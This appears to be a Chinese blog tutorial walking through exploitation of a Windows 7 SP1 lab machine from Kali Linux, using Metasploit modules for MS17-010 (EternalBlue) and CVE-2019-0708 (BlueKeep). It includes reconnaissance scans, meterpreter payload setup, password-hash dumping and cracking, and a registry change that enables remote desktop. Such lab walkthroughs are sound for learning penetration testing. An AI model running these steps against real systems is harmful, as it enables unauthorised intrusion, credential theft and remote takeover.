Win7 sp 1的ms17-010和CVE-2019-0708漏洞利用

于 2023-11-01 15:08:42 发布
阅读量545 收藏 4
点赞数 1
文章标签: 网络安全 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74378387/article/details/134141605
版权

环境搭建

kali
windows 7 sp 1:链接:https://pan.baidu.com/s/1AdimIwMPdg8Wf8FUeJbx2w?pwd=jfgh
win7的登录账号和密码为root:root
注意:如果nmap扫描不出东西,请登录到win7关闭它的防火墙
先让靶机与kali处于同一个网段
在这里插入图片描述

一、ms17-010漏洞利用

1.信息收集

ip add #查看kali的ip地址

在这里插入图片描述

arp-scan -l #查看局域网中所有ip

得到靶机ip为10.10.10.141
在这里插入图片描述

nmap -A -sV 10.10.10.141 #扫描靶机的所有信息和版本信息

得到靶机操作系统为Windows7
在这里插入图片描述

nmap --script=vuln 10.10.10.141 #使用namp对靶机进行已知漏洞探测
#--script可以指定脚本
#vuln脚本包含了许多已知漏洞

我们可以知道靶机存在ms17-010漏洞
在这里插入图片描述

2.漏洞利用

msfconsole #开启msf

在这里插入图片描述

search ms17-010 #查找ms17-010相关模块

在这里插入图片描述
在前面信息收集中,我们可以知道靶机开放了445端口存在smb服务,且靶机是Windows系统,使用我们使用id为0的攻击模块

use 0 #使用模块
show missing #查看必须配置的参数
set rhosts 10.10.10.141 #配置靶机IP

在这里插入图片描述
主要的配置完了,我们查看全部配置参数,来设置payload模块和target模块

show options #查看所有配置参数

在这里插入图片描述

show payloads #查看payload模块

我们知道靶机是Windows系统,我们需要靶机反向TCP连接。

set payload/windows/x64/meterpreter/reverse_tcp
# meterpreter是一种在目标系统上实现远程控制和管理功能强大的后门工具。
# reverse_tcp 反向TCP连接

在这里插入图片描述

set payload 31 #就是使用payload/windows/x64/meterpreter/reverse_tcp
#31 是模块对应的数字

在这里插入图片描述
设置靶机的系统版本,我们在前面已经知道靶机是windows7了
在这里插入图片描述
直接设置target。然后开始攻击
在这里插入图片描述
进入shell
在这里插入图片描述

hashdump #获取所有用户的密码

这个密码都是被进行了加密。
在这里插入图片描述
md5在线解密:https://www.cmd5.com/default.aspx
直接解密root用户的密码,得到root用户的密码为root
在这里插入图片描述

REG ADD HKLE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal: 这是用于添加(或修改)注册表键值的命令,其中HKLM\SYSTEM\CurrentControlSet\Control\Terminal是注册表的路径,表示要修改的注册表项的位置。
#/v fDenyTSConnections: 这是指定要添加(或修改)的注册表项的名称,fDenyTSConnections是要修改的注册表项的名称。
#/t REG_DWORD: 这是指定要添加的数据类型,REG_DWORD表示这是一个32位的DWORD值。
#/d 00000000: 这是指定要添加(或修改)的值,00000000表示开启远程终端服务连接。
#/f: 这是一个强制选项,表示在遇到任何错误时都应强制执行操作。
netstat -an #查看靶机开放的端口

在这里插入图片描述

rdesktop 10.10.10.141 #远程到靶机

在这里插入图片描述

二、CVE-2019-0708漏洞利用

nmap -sV -Pn 10.10.10.141
#-sV 版本检测
#-Pn no ping扫描

发现已经开放了远程桌面服务
在这里插入图片描述
用nessus扫描靶机得到CVE-2019-0708漏洞
在这里插入图片描述

msfconsole #开启msf
search CVE-2019-0708 #寻找相关漏洞模块

在这里插入图片描述
得到auxiliary(辅助模块)exploit(攻击模块),先使用辅助模块判断漏洞是否存在
在这里插入图片描述
发现存在漏洞后,使用攻击模块
在这里插入图片描述

set rhosts 10.10.10.141 #设置靶机ip
set payload windows/x64/meterpreter/bind_tcp #使用反向tcp连接的攻击payload
set target 5 #通过实际情况选择
run # 攻击

在这里插入图片描述
在这里插入图片描述
得到shell
在这里插入图片描述
=--------------------------------------------------------------------------------------------------------------------=
总结
漏洞利用的一般步骤:
1.信息收集获取靶机的ip,系统版本,开放端口,可能存在漏洞
2.用msf使用漏洞,设置相应的pyload,target,最后开始攻击

瓶盖报到!
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web服务器软件漏洞(MS15-034&CVE-2017-12615)
kid的博客
07-24 1305
web服务器软件漏洞(MS15-034&CVE-2017-12615) 想找找有没有能利用web服务器软件漏洞拿shell的,主要尝试了两个,但实际情况感人…(主要最近去了看雪安全开发者峰会,有大佬讲了最近很火的rdp那个洞,也提到了经典的永恒之蓝,确实这样的的洞很厉害啊,利用溢出直接攻陷主机,但二进制方面确实没有什么学习啊,所以突发奇想,想看看有没有什么利用iis,Apache之类的软件...
Windows 7—MS17_010漏洞
Anything-WY的博客
06-19 536
前提条件: 1.Windows 7系统:192.168.124.148 2.Kali系统:192.168.124.143 1.MS17_010 1.1端口扫描 nmap–sV 192.168.124.148 1.2攻击过程 1.开启msfconsole msfconsole 2.查看攻击工具有效性 use auxiliary/scanner/smb/smb_ms17_010 show options 3...
MS10-081/CVE-2010-2746
leeeryan
01-12 899
<br />comctl32.dll是Windows应用程序公用GUI图形用户界面模块。 在使用第三方可伸缩矢量图形 (SVG) 查看器时,Windows 公共控件库呈现特制网站的方式中存在一个远程执行代码漏洞。 如果用户访问了特制网页,此漏洞可能允许远程执行代码。<br /><br /> [+]info:<br /> ~~~~~~~~~<br /> MS10-081<br /> CVE-2010-2746<br /><br /> [+]poc:<br />#!/usr/bin/env ruby
KB编号、MS编号、CVE编号的区别
weixin_63137680的博客
10-27 2033
KB编号、MS编号、CVE编号的含义
【渗透测试:MS17_010(永恒之蓝)漏洞复现与分析】
qq_61947585的博客
07-14 1501
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
末班车的博客
03-10 1197
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
CVE-2019-0708漏洞利用脚本
01-10
自己下载到kali解压,参考文章https://blog.csdn.net/weixin_43742395/article/details/112432343
CVE-2019-0708漏洞利用源码.rar
01-04
Windows操作系统远程桌面服务漏洞(CVE-2019-0708)威胁程度较高,攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据在目标系统上执行恶意代码,从而获取机器的完全控制。此漏洞易被蠕虫病毒、勒索...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
永恒之蓝-MS17010 CVE-2017-0146
星虐
12-31 6833
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。 ...
Windows系统内核溢出漏洞提权
qq_61553520的博客
05-29 1649
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,提高打开的速度。
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝MS17010漏洞利用,以及日志特征和MSF使用方法
最新发布
yuanlirong22的专栏
09-03 1112
介绍如何利用永恒之蓝MS17010漏洞攻击,以及攻击成果后的操作系统日志分析,看看默认的操作系统日志是什么,方便在应急排查时对攻击有个清晰的了解
MS Office 漏洞CVE-2017-8759复现
柳似烟的专栏
09-19 2121
CVE-2017-8759
永恒之蓝漏洞自查-MS17010漏洞自查与修复
天翔空水木的专栏
07-24 3万+
MS17010漏洞时间线回溯 2017-03-12,微软发布MS17-010补丁包 2017-03-14,微软发布《MS17-010Windows SMB 服务器安全更新说明》 https://support.microsoft.com/zh-cn/help/4012598/title 2017-04-14,Shadowbroker发布漏洞利用工具 2017-05-12晚上20 时左右,...
使用metasploit(MSF)对windowsms17-010漏洞进行利用的过程
热门推荐
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
ms17010漏洞利用_CVE20201472域内提权漏洞
weixin_35039018的博客
01-23 1484
0x01 漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控并且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值